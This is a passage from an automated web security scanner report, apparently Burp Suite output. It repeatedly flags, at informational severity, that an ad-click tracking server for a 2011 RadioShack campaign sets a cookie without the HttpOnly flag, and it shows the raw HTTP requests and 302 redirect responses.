Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_160;RS_SELL_2011Q1_AOL_CPA_160;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/160:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.252. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.253. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.254. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.255. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.256. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.257. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.258. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.259. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.260. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567? HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_300;RS_SELL_2011Q1_AOL_CPA_300;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=;ord=394936567?
Content-Length: 568
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.261. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.262. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
